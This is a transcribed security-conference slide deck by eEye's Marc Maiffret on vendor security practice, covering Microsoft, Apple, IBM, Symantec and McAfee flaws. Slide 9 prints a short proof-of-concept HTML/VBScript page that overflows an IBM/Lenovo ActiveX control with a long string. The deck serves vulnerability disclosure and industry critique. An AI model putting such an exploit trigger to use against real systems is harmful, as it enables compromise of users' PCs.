More Than A Microsoft World. Marc Maiffret Co-Founder Chief Hacking Officer

Transcription

1 More Than A Microsoft World Marc Maiffret Co-Founder Chief Hacking Officer

2 The eeye Marketing Slide We Make Security Software Retina Network Security Scanner Blink Host Based Security REM Enterprise Vulnerability/Threat Management We Also Like to Break Things We have a research team (a real one) Credited for many important discoveries Many Microsoft SYSTEM" vulnerabilities CodeRed, Sapphire/Slammer worms Many client-side vulnerabilities Hardware Exploitation We also love our Tequila.

3 Microsoft Security, or Insecurity, The Beginning The Microsoft security revolution started in 1999 First major remote SYSTEM vulnerabilities First proof of concept buffer overflow exploits Widespread Nature of Microsoft Software Finding Microsoft bugs was unique and cool Birth of the Microsoft Security Response Center Security is a marketing problem Purely theoretical That is a denial of service Heap overflows are not exploitable

4 Why Microsoft Got Better At Security Imagine trying to walk down the street and constantly getting punched in the face The CodeRed Worm. Independent Researchers. You get better at anything in business to make money, or to not lose money Microsoft is getting better for both reasons Large corporations threatened to drop Microsoft because of insecurity Microsoft wants to make money off of security, security company acquisitions, move into consumer anti-virus, etc They are not better because they care about you, they care about their bottom line and share holders

5 The Microsoft Security Progression Microsoft has a better security process than any other software vendor Windows Vista, does improve security a lot Researchers, exploit developers, have all progressed greatly over the last 7 years Most major software companies have made almost zero progress with security

6 Those other vulnerabilities Example: Veritas Backup Software Vulnerabilities Remote code execution Stack based buffer overflow Value of compromise Security software, does audit, doesn t protect Where was your Patch Tuesday for this?

7 Apple Security, 200 Artists Can t Be Wrong! Year over year increase in vulnerabilities No standard security response team EIP=0x , how is that a vulnerability? Lack of separation of product and feature updates More than just Apple hardware itunes, QuickTime (multiple file formats and protocols), etc Large install base of software Over 42 million ipods have been sold Over 10 million itunes users

8 IBM says Just zeroday it! A Billion Dollars Worth of Incompetence Client-Side Vulnerability Affects majority of IBM/Lenovo PCs and ThinkPad's Stack based big buffer overflow, party like its 1999 Over 3 weeks to finally get a vendor response Vendor response, Go ahead and publish I can t expect you to hold off because the people responsible don t seem to want to do the right thing IBM Security eeye has a come to Jesus talk with IBM IBM finally releases update

9 But since they said to zero-day it Discovered by: Andre Protas (eeye) <html> <object classid='clsid:74ffe28d d5-990c ' id='myb1tch'></object> <script language='vbscript'> donkeypunch=string(300,"a") myb1tch.runegatherer donkeypunch </script> </html>

10 Vendor Security Response Teams Microsoft does it best An address and a single person taking phone calls, is not a security response team Response team active within development, ability to impact release schedules Separation of product feature updates and security updates Internal source code auditing Just simply doing the basics around security of code.

11 Riddle Me This Answer this question: In the last two months, what two products (Non-Microsoft), had vulnerabilities that could be used to gain SYSTEM access to over 75% of your average corporate Windows deployments? Hint The vulnerabilities were within security products.

12 And The Winners Are Symantec Symantec Corporate Anti-Virus and Client Security Vulnerability in agent management interface Code Execution as SYSTEM, very reliable Fast patch release cycle Bug Discovery: Derek Soeder (eeye)

13 And The Winners Are (cont.) McAfee McAfee epo (Common Management Agent) Most McAfee corporate software affected Design flaw, remote file creation as SYSTEM Exploitation always 100% reliable McAfee accidentally fixed vulnerability Bug Discovery: Barnaby Jack (eeye)

14 The Insecurity of Security Software Security software, is still just software Software developers will always be human, even at security companies More responsibility to strive for perfection The attack surface challenge Security software is a monoculture in itself Security software is usually rather standard Reusable components from OS to OS, service pack independent, etc Exploits are typically more reliable

15 Security Software Is Also Microsoft Focused Patch Management Almost all are exclusive to Microsoft patch deployment False sense of security Intrusion Prevention Revolve around Patch Tuesday Focus on published vulnerabilities Example: CA License Vulnerability Vulnerability Assessment Focus on UNIX/Linux and Microsoft specific flaws Do not remotely assess most major third party flaws Do not assess risk of third party file format vulnerabilities, patches

16 Microsoft 7 Years Later There Has Never Been A Worse Time To Run Microsoft Software More Microsoft zeroday in 2006 than any other year 11 out of 39 bulletins in 2006 contained zeroday fixes Proliferation of file format vulnerabilities Worms are dead, but not because of Microsoft

17 MS Server Service Vulnerability Exploitation in the wild, zero day All NT based operating systems affected Exploits within 3-4 hours Automated botnet(?worm?) within 4 days Anti-Virus failing (again, reactive

18 History Will Repeat Itself? Researchers There has never been a better time to be in vulnerability research You have a 7 year head start on the average software company Go borrow enterprise software if you have to, ( signup today! Software Vendors You will save more money by investing in security now Learn from history, learn from Microsoft s mistakes IT Community You are stuck in the middle Organizational awareness of non-microsoft vulnerabilities Security policies, plans, products, people, and policies that do not solely revolve around Microsoft when it comes to your Windows platforms

19 The Million Dollar Question Where do you see security in the next few years? Security is reaction to how people do business What does security look like When corporations move back to thin clients? When consumer applications are all web hosted? What do attacks then start to look like? Thin clients: Does the value of local privilege escalation vulnerabilities increase? Web apps: How do you research what your not legally allowed to audit? How do you proactively protect and detect against these attacks?

20 Thank You